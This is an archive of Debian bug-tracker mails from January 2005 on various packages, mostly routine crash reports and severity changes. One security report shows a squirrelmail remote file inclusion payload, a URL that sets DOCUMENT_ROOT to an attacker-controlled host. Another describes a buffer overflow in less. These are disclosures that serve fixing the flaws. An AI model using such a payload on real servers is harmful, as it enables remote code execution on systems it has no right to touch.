Bug#292726: buffer overflow in charset (CAN-2005-0086)

2005-01-28 Thread Joey Hess
Package: less
Version: 382-2
Severity: grave
Tags: security patch

less is vulnerable to a head-based buffer overflow that can be triggered
by viewing certian binary files. This is theoretically exploitable by
providing a user with such a file and waiting for him to run less on it.

The problem was discovered by redhat and involves the expand_linebuf
function neglecting to expand the size of the charset buffer when it
expands the other buffers. Details in their BTS, including a test case
and a patch: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=145527

I tried to exploit it on Debian but failed to see the crash, however
this could be due to setup differences from red hat. The code seems to
be the same.

Please use CAN-2005-0086 when referring to this security hole.

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.4.27
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)

Versions of packages less depends on:
ii  debianutils 2.11.2   Miscellaneous utilities specific t
ii  libc6   2.3.2.ds1-20 GNU C Library: Shared libraries an
ii  libncurses5 5.4-4Shared libraries for terminal hand

-- no debconf information

-- 
see shy jo


signature.asc
Description: Digital signature


Bug#271427: some progress

2005-01-28 Thread Dafydd Harries
I think I've made some progress on this.

I investigated the possibility of using Fontforge to script the copying
of glyphs from one font to another, and it turns out that this is quite
easy.

I have written two scripts:

 - A Fontforge script which copies a single glyph from one font to
   another.

 - A shell script which copies Serbian glyphs for each of the broken
   fonts.

The list of broken font files is based upon the information in the
original bug report about which fonts have problems. Since I can't read
Cyrillic, the only glyphs that are copied are

 - small Tshe (aka U+0452, afii10099), because it was mentioned in the
   original report, and

 - large Tshe (aka U+0402, afii10051), because I'm guessing that that's
   wrong too, due to the fact that it's different in Valek's version.

It should be trivial to make the shell script copy other glyphs across,
or to copy between additional fonts. If somebody can provide me with a
comprehensive list of the glyphs that are broken, this would be very
useful.

The script also uses the afmutil.py script you mentioned to generate a
diff between the AFM file before the copy and the same file afterwards,
ignoring changes in comments and such.

I ran the scripts on the fonts in the gsfonts package to copy glyphs
from the fonts in

ftp://ftp.gnome.ru/fonts/urw/release/urw-fonts-1.0.7pre40.tar.bz2

I saw some side-effects to the metrics of the scircumflex and
jcircumflex characters, but only very small ones (i.e. two numbers being
changed by 1). I'm guessing these might be due to a rounding error in
Fontforge or something like that. Other than that, the only changes are
to comments and to the metrics of the glyphs in question.

I don't know if hinting has been affected.

I have uploaded the two scripts I wrote, afmutil.py (for convenience), a
a HTML page for testing the fonts, a screenshot of that page on my
system, and a Debian package with the modified fonts, to the following
location:

http://muse.19inch.net/~daf/dump/271427/

In the screenshot, Schoolbook and Palladio look fine. Some fonts don't
appear to have bold variants. Nimbus Roman seems to have a buggy italic
variant, and Bookman has buggy glyphs for all variants, though small
Tsche seems fine for the Roman variant. The possibility that some of the
old versions of the fonts might still be hanging around in memory or
something like that, might account for some of these problems, though.

-- 
Dafydd


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#291233: mozilla-firefox: Firefox fails to start via gaim

2005-01-28 Thread Kimberly Goh
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Kimberly <[EMAIL PROTECTED]>
To: Debian Bug Tracking System
<[EMAIL PROTECTED]>
Subject: mozilla-firefox: Firefox fails to start via
gaim
Bcc: Kimberly <[EMAIL PROTECTED]>
X-Mailer: reportbug 3.2
Date: Sat, 29 Jan 2005 12:24:17 +0800

Package: mozilla-firefox
Version: 1.0+dfsg.1-2
Followup-For: Bug #291233

This bug is not fixed yet.  I've just installed
debian-testing from a
fresh set of CDs and the 'net, with X11 etc... I
installed:
mozilla-firefox
mozilla-firefox-gnome-support
and uninstalled epiphany,
and now when gaim pops up 'you have mail, go to mail',
and I click the
goto-mail button, the following error is logged in
.xsession-errors:

/usr/lib/mozilla-firefox/firefox-bin: relocation
error:
/usr/lib/mozilla-firefox/components/libbrowsercomps.so:
undefined
symbol: NS_NewUnionEnumerator
Error showing url: There was an error launching the
default action
command associated with this location.

I tried uninstalling and reinstalling firefox, it has
the same
behaviour.  I've tried logging out and restarting the
gnome desktop
environment, same thing happens.

Firefox works fine when used normally, it only fails
when gaim tries to
start it.  I would've filed this under
mozilla-firefox-gnome-support,
but I saw this similar bug.

Suggestions?
Thanks,
Kim



-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.4.27-1-386
Locale: LANG=en_SG, LC_CTYPE=en_SG
(charmap=ISO-8859-1)

Versions of packages mozilla-firefox depends on:
ii  debianutils  2.8.4  
Miscellaneous utilities specific t
ii  fontconfig   2.2.3-4 generic
font configuration library
ii  libatk1.0-0  1.8.0-4 The ATK
accessibility toolkit
ii  libc62.3.2.ds1-20GNU C
Library: Shared libraries an
ii  libfontconfig1   2.2.3-4 generic
font configuration library
ii  libfreetype6 2.1.7-2.3   FreeType
2 font engine, shared lib
ii  libgcc1  1:3.4.3-6   GCC
support library
ii  libglib2.0-0 2.6.1-3 The GLib
library of C routines
ii  libgtk2.0-0  2.4.14-2The GTK+
graphical user interface
ii  libidl0  0.8.3-1 library
for parsing CORBA IDL file
ii  libjpeg626b-9The
Independent JPEG Group's JPEG
ii  libkrb53 1.3.6-1 MIT
Kerberos runtime libraries
ii  libpango1.0-01.6.0-3 Layout
and rendering of internatio
ii  libpng12-0   1.2.8rel-1  PNG
library - runtime
ii  libstdc++5   1:3.3.5-5   The GNU
Standard C++ Library v3
ii  libx11-6 4.3.0.dfsg.1-10 X Window
System protocol client li
ii  libxext6 4.3.0.dfsg.1-10 X Window
System miscellaneous exte
ii  libxft2  2.1.2-6
FreeType-based font drawing librar
ii  libxp6   4.3.0.dfsg.1-10 X Window
System printing extension
ii  libxrender1  0.8.3-7 X
Rendering Extension client libra
ii  libxt6   4.3.0.dfsg.1-10 X Toolkit
Intrinsics
ii  psmisc   21.5-1  Utilities
that use the proc filesy
ii  xlibs4.3.0.dfsg.1-10 X
Keyboard Extension (XKB) configu
ii  zlib1g   1:1.2.2-3  
compression library - runtime

-- no debconf information




__ 
Do you Yahoo!? 
Yahoo! Mail - Find what you need with new enhanced search.
http://info.mail.yahoo.com/mail_250


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292710: unable to upgrade or remove

2005-01-28 Thread Steve Langasek
severity 292710 important
thanks

This is not a bug in either the woody or sarge version of the package, only
in a version that's no longer in the archive; so it's not release-critical
for sarge.  (No version of frozen-bubble-data currently in the archive has a
postrm script.)

-- 
Steve Langasek
postmodern programmer


signature.asc
Description: Digital signature


Processed: Re: unable to upgrade or remove

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> severity 292710 important
Bug#292710: unable to upgrade or remove
Severity set to `important'.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292720: tomcat4: Tomcat4 does not start because coyote apparently fails

2005-01-28 Thread Thomas Lamy
Package: tomcat4
Version: 4.1.31-2
Severity: grave
Justification: renders package unusable

After upgrading to the latest "Sarge" package tomcat4 no longer starts.
I already googled, but 
1) "example webapps not installed" does not apply here (umm, they're
   installed but commented in server.xml)
2) "Check server.xml and web.xml validity" - I don't know how to do
   that. shouldn't there be some parse errors in the log if that
   applies?

Sorry if this is not a package but a user bug, but I'm clueless now...


Thanks for any response!
   Thomas



>From the log (w/ line wraps intentionally removed):

Using CATALINA_BASE:   /var/lib/tomcat4
Using CATALINA_HOME:   /usr/share/tomcat4
Using CATALINA_TMPDIR: /var/lib/tomcat4/temp
Using JAVA_HOME:   /usr/lib/j2sdk1.4

29.01.2005 02:07:44 org.apache.coyote.http11.Http11Protocol init
INFO: Initializing Coyote HTTP/1.1 on http-8180
Starting service Tomcat-Standalone
Apache Tomcat/4.1
Catalina.start: LifecycleException:  Context startup failed due to
previous errors
LifecycleException:  Context startup failed due to previous errors
at 
org.apache.catalina.core.StandardContext.start(StandardContext.java:3578)
at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1141)
at org.apache.catalina.core.StandardHost.start(StandardHost.java:707)
at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1141)
at 
org.apache.catalina.core.StandardEngine.start(StandardEngine.java:316)
at 
org.apache.catalina.core.StandardService.start(StandardService.java:450)
at 
org.apache.catalina.core.StandardServer.start(StandardServer.java:2143)
at org.apache.catalina.startup.Catalina.start(Catalina.java:463)
at org.apache.catalina.startup.Catalina.execute(Catalina.java:350)
at org.apache.catalina.startup.Catalina.process(Catalina.java:129)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
at java.lang.reflect.Method.invoke(Method.java:324)
at org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:156)
Stopping service Tomcat-Standalone
Catalina.stop: LifecycleException:  Coyote connector has not been started
LifecycleException:  Coyote connector has not been started
at 
org.apache.coyote.tomcat4.CoyoteConnector.stop(CoyoteConnector.java:1296)
at 
org.apache.catalina.core.StandardService.stop(StandardService.java:499)
at 
org.apache.catalina.core.StandardServer.stop(StandardServer.java:2178)
at org.apache.catalina.startup.Catalina.start(Catalina.java:494)
at org.apache.catalina.startup.Catalina.execute(Catalina.java:350)
at org.apache.catalina.startup.Catalina.process(Catalina.java:129)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
at java.lang.reflect.Method.invoke(Method.java:324)
at org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:156)



-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (990, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.4.21-4-686
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages tomcat4 depends on:
ii  adduser  3.59Add and remove users and groups
ii  apache-utils 1.3.33-3utility programs for webservers
ii  j2re1.3 [java-virtual-machin 1.3.1.02b-2 Blackdown Java(TM) 2 Runtime Envir
ii  j2sdk1.3 [java-compiler] 1.3.1.02b-2 Blackdown Java(TM) 2 SDK, Standard
ii  java-virtual-machine-dummy [ 0.3 Dummy Java virtual machine
ii  libtomcat4-java  4.1.31-2Java Servlet engine -- core librar

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292116: One more thing

2005-01-28 Thread Marco d'Itri
severity 292116 normal
thanks

On Jan 29, Decklin Foster <[EMAIL PROTECTED]> wrote:

> Thanks for the fix, but this doesn't work if /bin/sh is dash -- the
> correct character to negate a character class in a pattern match is !,
> not ^ (although bash still accepts the latter for the sake of not
> gratuitously breaking things). Cf. POSIX 3.13.
I run dash on all my systems and the script works fine.

-- 
ciao,
Marco


signature.asc
Description: Digital signature


Bug#292239: marked as done (manpage looks not distributeable, as license not adhered)

2005-01-28 Thread Debian Bug Tracking System
Your message dated Fri, 28 Jan 2005 20:02:30 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#292239: fixed in oidentd 2.0.7-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at maintonly) by bugs.debian.org; 25 Jan 2005 20:49:01 +
>From [EMAIL PROTECTED] Tue Jan 25 12:49:00 2005
Return-path: <[EMAIL PROTECTED]>
Received: from pcpool00.mathematik.uni-freiburg.de [132.230.30.150] 
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CtXcS-0002eA-00; Tue, 25 Jan 2005 12:49:00 -0800
Received: from pcpool08.mathematik.uni-freiburg.de ([132.230.30.158])
by pcpool00.mathematik.uni-freiburg.de with asmtp (Exim 3.35 #1 
(Debian))
id 1CtXcU-000238-00
for <[EMAIL PROTECTED]>; Tue, 25 Jan 2005 21:49:02 +0100
Received: from brl by pcpool08.mathematik.uni-freiburg.de with local (Exim 3.35 
#1 (Debian))
id 1CtXcU-89-00
for <[EMAIL PROTECTED]>; Tue, 25 Jan 2005 21:49:02 +0100
Date: Tue, 25 Jan 2005 21:49:02 +0100
From: "Bernhard R. Link" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: manpage looks not distributeable, as license not adhered
Message-ID: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.28i
Sender: "Bernhard R. Link" <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Package: oidentd
Version: 2.0.7-1
Severity: serious

The following manpages say they are only distributeable under
the GFDL, but do not include the license text required by this
license:

oidentd.conf.5.gz oidentd_masq.conf.5.gz oidentd.8.gz

This mass-filing of bugs was announced 2005-01-09 in my mail to 
debian-devel and debian-legal:
http://lists.debian.org/debian-devel/2005/01/msg00499.html
http://lists.debian.org/debian-legal/2005/01/msg00262.html

Hochachtungsvoll,
Bernhard R. Link

---
Received: (at 292239-close) by bugs.debian.org; 29 Jan 2005 01:06:14 +
>From [EMAIL PROTECTED] Fri Jan 28 17:06:14 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1Cuh42-0006tJ-00; Fri, 28 Jan 2005 17:06:14 -0800
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1Cuh0Q-00060E-00; Fri, 28 Jan 2005 20:02:30 -0500
From: Martin Waitz <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#292239: fixed in oidentd 2.0.7-2
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Fri, 28 Jan 2005 20:02:30 -0500
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 
X-CrossAssassin-Score: 2

Source: oidentd
Source-Version: 2.0.7-2

We believe that the bug you reported is fixed in the latest version of
oidentd, which is due to be installed in the Debian FTP archive:

oidentd_2.0.7-2.diff.gz
  to pool/main/o/oidentd/oidentd_2.0.7-2.diff.gz
oidentd_2.0.7-2.dsc
  to pool/main/o/oidentd/oidentd_2.0.7-2.dsc
oidentd_2.0.7-2_i386.deb
  to pool/main/o/oidentd/oidentd_2.0.7-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Martin Waitz <[EMAIL PROTECTED]> (supplier of updated oidentd package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Fri, 28 Jan 2005 23:50:07 +0100
Source: oidentd
Binary: oidentd
Architecture: source i386
Version: 2.0.7-2
Distribution: unstable
Urgency: high
Maintainer: Martin Waitz <[EMAIL PROTECTED]>
Changed-By: Martin Waitz <[EMAIL PROTECTED]>
De

Processed: Re: Bug#292116: One more thing

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> severity 292116 normal
Bug#292116: module-init-tools: breaks boot-up if modutils is not installed
Severity set to `normal'.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292116: One more thing

2005-01-28 Thread Decklin Foster
reopen 292116
thanks

Thanks for the fix, but this doesn't work if /bin/sh is dash -- the
correct character to negate a character class in a pattern match is !,
not ^ (although bash still accepts the latter for the sake of not
gratuitously breaking things). Cf. POSIX 3.13.

--- module-init-tools.dpkg-dist 2005-01-28 19:28:59.0 -0500
+++ module-init-tools   2005-01-28 19:31:06.0 -0500
@@ -8,7 +8,7 @@
 PATH="/sbin:/bin"
 
 KVER=$(uname -r)
-KMAJ=${KVER%${KVER#*.*[^.]}}
+KMAJ=${KVER%${KVER#*.*[!.]}}
 KMAJ=${KMAJ%.}
 
 if [ -w /lib/modules/$KVER/ ]; then

-- 
things change.
[EMAIL PROTECTED]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: One more thing

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> reopen 292116
Bug#292116: module-init-tools: breaks boot-up if modutils is not installed
Bug reopened, originator not changed.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#189552: You cannot remove conffiles and expect dpkg -i to reinstall them.

2005-01-28 Thread Carlos O'Donell

I'm helping cleanup some of the dpkg bugs so here goes.

In response to the poster here that says magicfilter is no longer
properly installing the filters, he is incorrect.

The filters are conffiles as far as dpkg is concerned. If you move the
conffiles away, remove the package, and reinstall. There is no reason
for dpkg to touch the conffiles. Infact it would be wrong if they were
reinstalled.

You must issue a purge before the reinstall for the conffiles to be
installed.

I would preculde any and all problems with magicfilter and dpkg, I went
through the process described the bug initiator without any problems,
including both debug display levels (-D2 and -D100).

Test system:
ii  magicfilter  1.2-58   automatic printer filter
ii  libc62.3.2.ds1-18 GNU C Library: Shared libraries
ii  dpkg 1.10.24  Package maintenance system for 
Debian

Thus a solution for the submitter is the following:

a. Copy the conffiles away.
b. dpkg -P 
c. dpkg -i 
d. Put some conffiles back.

There is a secondary issue of dpkg crashing usind -D2, I cannot
reproduce this with the current dpkg.

IMO this is the same issue as seen with the xlibs_4.2.1-6_i386.deb
package. A question to the submitter? Did you delete the files and then
expect that a reinstall would solve the problem?

The file xkb/keymaps/xfree86 is a conffile of xlibs, and again follows
the policy manual. The conffile will *not* be overwritten or reinstalled
until after a purge.

IMO both this and bug #189555 at non-issues.

The real issue is dpkg crashing at -D2.

Cheers,
Carlos.




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292714: squirrelmail: security hole - uri poisoning

2005-01-28 Thread Grant Hollingworth
Package: squirrelmail
Version: 1:1.2.6-1.4
Severity: grave
Justification: user security hole
Tags: security

An attacker can attach DOCUMENT_ROOT to a SquirrelMail URI (eg,
/src/redirect.php?DOCUMENT_ROOT=http://evil.example.com).  If
register_globals and allow_url_fopen are on (they are by default in the
stable php4) then functions/display_message.php will include the
attacker's script, allowing access as www-data.

There is a fix in version 1.48.2.1 of display_message.php:
http://cvs.sourceforge.net/viewcvs.py/squirrelmail/squirrelmail/functions/display_messages.php?r1=1.48&r2=1.48.2.1

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux okcomputer 2.4.29 #1 SMP Thu Jan 20 20:41:12 MST 2005 i686
Locale: LANG=en_CA, LC_CTYPE=en_CA

Versions of packages squirrelmail depends on:
ii  apache1.3.26-0woody6 Versatile, high-performance HTTP s
ii  aspell0.33.7.1.1-9   A more intelligent replacement for
ii  debconf   1.2.35 Debian configuration management sy
ii  ispell3.1.20-21.1International Ispell (an interacti
ii  perl  5.6.1-8.8  Larry Wall's Practical Extraction 
ii  php4  4:4.1.2-7.0.1  A server-side, HTML-embedded scrip
ii  wwwconfig-common  0.0.19 Debian web auto configuration.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#289796: marked as done (courier-filter-perl: Perl 5.8 dependency not represented in package)

2005-01-28 Thread Debian Bug Tracking System
Your message dated Fri, 28 Jan 2005 18:02:14 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#289796: fixed in courier-filter-perl 0.16
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 11 Jan 2005 03:00:52 +
>From [EMAIL PROTECTED] Mon Jan 10 19:00:51 2005
Return-path: <[EMAIL PROTECTED]>
Received: from 64.95.78.120-rev.colospace.com (dev.gaiahost.net) [64.95.78.120] 
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CoCH5-0005Vh-00; Mon, 10 Jan 2005 19:00:51 -0800
Received: from localhost (localhost [127.0.0.1])
  (uid 1000)
  by dev.gaiahost.net with local; Mon, 10 Jan 2005 22:00:21 -0500
  id 7DF2.41E34145.1A2C
From: Mark Bucciarelli <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: courier-filter-perl: Perl 5.8 dependency not represented in package
X-Mailer: reportbug 1.50
Date: Mon, 10 Jan 2005 22:00:21 -0500
Reply-To: Mark Bucciarelli <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Package: courier-filter-perl
Version: 0.15
Severity: serious
Justification: Policy 3.5

Line 26 of /usr/share/courier-filter-perl/perl5/Courier/Filter.pm is:

use v5.8;

This requirement is not represented in the testing package of
courier-filter-perl.
 
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux dev.gaiahost.net 2.4.18-bf2.4 #1 Son Apr 14 09:53:28 CEST 2002 
i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages courier-filter-perl depends on:
ii  courier-mta   0.47-2.backports.org.1 Courier Mail Server - ESMTP daemon
ii  liberror-perl 0.13-2 Exception module for Perl
ii  perl  5.6.1-8.8  Larry Wall's Practical Extraction 


---
Received: (at 289796-close) by bugs.debian.org; 28 Jan 2005 23:05:41 +
>From [EMAIL PROTECTED] Fri Jan 28 15:05:41 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CufBN-0005KK-00; Fri, 28 Jan 2005 15:05:41 -0800
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1Cuf82-0003TC-00; Fri, 28 Jan 2005 18:02:14 -0500
From: Julian Mehnle <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#289796: fixed in courier-filter-perl 0.16
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Fri, 28 Jan 2005 18:02:14 -0500
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Source: courier-filter-perl
Source-Version: 0.16

We believe that the bug you reported is fixed in the latest version of
courier-filter-perl, which is due to be installed in the Debian FTP archive:

courier-filter-perl_0.16.dsc
  to pool/main/c/courier-filter-perl/courier-filter-perl_0.16.dsc
courier-filter-perl_0.16.tar.gz
  to pool/main/c/courier-filter-perl/courier-filter-perl_0.16.tar.gz
courier-filter-perl_0.16_all.deb
  to pool/main/c/courier-filter-perl/courier-filter-perl_0.16_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Julian Mehnle <[EMAIL PROTECTED]> (supplier of updated courier-filter-perl 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Mon, 17 Jan 2005 20:15:13 +0100
Source: courier-filter-perl
Binary: courier-filter-perl
Architecture: source all
Version: 0.16
Distribution: unstable
Urgency: low
Maintainer: Julian Mehnle <[EMAIL PROTECTED]>
Changed-By: Juli

Bug#292710: unable to upgrade or remove

2005-01-28 Thread Eduard Bloch
Package: frozen-bubble-data
Version: 1.0.0-6
Severity: grave

Hello,

when I try to upgrade or remove this package, I always end up with the
following error:

Unpacking replacement frozen-bubble-data ...
mv: cannot stat `/usr/games/frozen-bubble.wav': No such file or directory
dpkg: warning - old post-removal script returned error exit status 1
dpkg - trying script from the new package instead ...
dpkg: error processing 
/var/cache/apt/archives/frozen-bubble-data_1.0.0-6_all.deb (--unpack):
 there is no script in the new version of the package - giving up
 preinst called with unknown argument `abort-upgrade'
 dpkg: error while cleaning up:
  subprocess pre-installation script returned error exit status 1
  Errors were encountered while processing:
   /var/cache/apt/archives/frozen-bubble-data_1.0.0-6_all.deb
   E: Sub-process /usr/bin/dpkg returned an error code (1)



-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.10
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#291060: libstdc++6-4.0-doc: cannot install

2005-01-28 Thread Laurent Bonnaud
> > # apt-get install libstdc++6-4.0-doc
> > [...]
> > Unpacking libstdc++6-4.0-doc (from 
> > .../libstdc++6-4.0-doc_4.0-0pre4_all.deb) ...
> > dpkg: error processing 
> > /var/cache/apt/archives/libstdc++6-4.0-doc_4.0-0pre4_all.deb (--unpack):
> >  unable to clean up mess surrounding 
> > `./usr/share/doc/gcc-4.0-base/libstdc++/html_user/structstd_1_1tr1_1_1tuple__size_3_01tuple_3_01___null_class_00_01___null_class_00_01___null_class_00_01___null_class_00_01___null_class_00_01___null_class_00_01___null_class_00_01___null_class_00_01___null_'
> >  before installing another version: File name too long
> > dpkg-deb: subprocess paste killed by signal (Broken pipe)
> 
> are you able to reproduce the failure with the current version in
> experimental?

No, it is fixed.  Thank you !

I'm not closing the bug since I'm not sure if there is still an issue
with doxygen.

-- 
Laurent Bonnaud.
http://www.lis.inpg.fr/pages_perso/bonnaud/




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#285135: 285135

2005-01-28 Thread David Schleef
severity 285135 important
thanks

A program that is doing something CPU-intensive and using a lot of
CPU is not a grave bug.



dave...



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: re: 285135

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> severity 285135 important
Bug#285135: swf-player: Eats all CPU time and freezes galeon when various pages 
are opened simultaneously.
Severity set to `important'.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#285178: siproxd: bug #285178 confirmed

2005-01-28 Thread Antonio Gallo
Package: siproxd
Version: 0.57.snap040720-2
Followup-For: Bug #285178


I have the same problem. I use kphone.

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.4.22
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages siproxd depends on:
ii  adduser  3.56Add and remove users and groups
ii  libc62.3.2.ds1-20GNU C Library: Shared libraries an
ii  libgcc1  1:3.4.1-4sarge1 GCC support library
